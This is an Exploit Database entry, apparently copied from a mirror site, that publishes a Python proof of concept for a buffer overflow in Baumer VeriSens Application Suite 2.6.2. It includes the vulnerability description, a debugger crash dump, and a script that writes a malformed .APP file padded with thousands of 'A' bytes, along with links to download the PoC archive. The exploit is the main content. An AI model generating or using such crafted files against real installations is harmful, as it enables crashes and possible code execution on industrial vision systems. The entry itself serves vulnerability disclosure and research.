Baumer VeriSens Application Suite 2.6.2 – Buffer Overflow (PoC)

• Exploit Database
• 16 阅读

• 作者： LiquidWorm
  日期： 2016-02-03
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/39403/

• #!/usr/bin/env python
  #
  #
  # Baumer VeriSens Application Suite 2.6.2 Buffer Overflow Vulnerability
  #
  #
  # Vendor: Baumer Holding AG | Baumer Optronic GmbH
  # Product web page: http://www.baumer.com
  # Software link: http://www.baumer.com/us-en/products/identification-image-processing/software-and-starter-kits/verisens-application-suite/
  # Affected version: 2.6.2 (ID-CS-XF-XC)
  #
  # Summary: The Baumer Application Suite is the intuitive configuration
  # software for VeriSens vision sensors, which makes it quick and simple
  # for even new users to implement image processing tasks. Starting with
  # the creation of test tasks through to the management of jobs, the program
  # will take you through just a few steps to reach your goal.
  #
  # Desc: The vulnerability is caused due to a boundary error in baselibs.dll
  # library when processing device job file, which can be exploited to cause
  # a buffer overflow when a user opens e.g. a specially crafted .APP file.
  # Successful exploitation could allow execution of arbitrary code on the
  # affected machine.
  #
  # -------------------------------------------------------------------------
  # (78c.cb0): Access violation - code c0000005 (first chance)
  # First chance exceptions are reported before any exception handling.
  # This exception may be expected and handled.
  # Exported symbols for C:\Program Files (x86)\Baumer\VeriSens Application Suite v2.6.2\AppSuite\baselibs.dll - 
  # eax=4d81ab45 ebx=4d81ab45 ecx=41414141 edx=41414141 esi=4d81ab45 edi=0c17e010
  # eip=56bc4186 esp=0040a020 ebp=0040a020 iopl=0 nv up ei pl nz na po nc
  # cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00210202
  # baselibs!b_Int_restore+0x6:
  # 56bc4186 8b00mov eax,dword ptr [eax]ds:002b:4d81ab45=????????
  # 0:000> u
  # baselibs!b_Int_restore+0x6:
  # 56bc4186 8b00mov eax,dword ptr [eax]
  # 56bc4188 8bc8mov ecx,eax
  # 56bc418a 8bd0mov edx,eax
  # 56bc418c c1ea18shr edx,18h
  # 56bc418f c1f908sar ecx,8
  # 56bc4192 81e100ff0000and ecx,0FF00h
  # 56bc4198 0bcaorecx,edx
  # 56bc419a 8bd0mov edx,eax
  # 0:000> dds
  # 56bc6b8600107d80
  # 56bc6b8a8b117457
  # 56bc6b8ef0e181cb
  # 56bc6b92e8000000
  # 56bc6b96fffff9e6
  # 56bc6b9a02ebf88b
  # 56bc6b9eff85fa8b
  # 56bc6ba668000001
  # 56bc6baa56c2afa4 baselibs!VsInfoFeed::Listener::`vftable'+0xb154
  # 56bc6bae3f8ce857
  # 56bc6bb2c483ffff
  # 56bc6bb675c0850c USER32!SetKeyboardState+0x705a
  # 56bc6bba325b5f07
  # -------------------------------------------------------------------------
  #
  # Tested on: Microsoft Windows 7 Professional SP1 (EN)
  #Microsoft Windows 7 Ultimate SP1 (EN)
  #
  #
  # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  # @zeroscience
  #
  #
  # Advisory ID: ZSL-2016-5303
  # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5303.php
  #
  #
  # 14.11.2015
  #
  
  header = ("\x00\x00\x00\x01\x00\x00\x00\x04\x95\xCF\x82\xF6\x00\x00\x00"
  "\x01\x00\x00\x00\x04\x00\x00\x00\x2B\x00\x00\x00\x50\x00\x00"
  " \x00\x05\x43\x6F\x64\x65\x00\x00\x00\x00\x50\x00\x00\x00\x01"
  "\x00\x00\x00\x00\x50\x00\x00\x00") #\x0F
  
  buffer = "\x41" * 6719 + "\x42\x42\x42\x42"
   
  f = open ("exploit.app", "w")
  f.write(header + buffer +'\x0F')
  f.close()
  print "File exploit.app created!\n"
  
  #
  # PoC: http://www.zeroscience.mk/codes/bvas-5303.app.zip
  #https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39403.zip
  #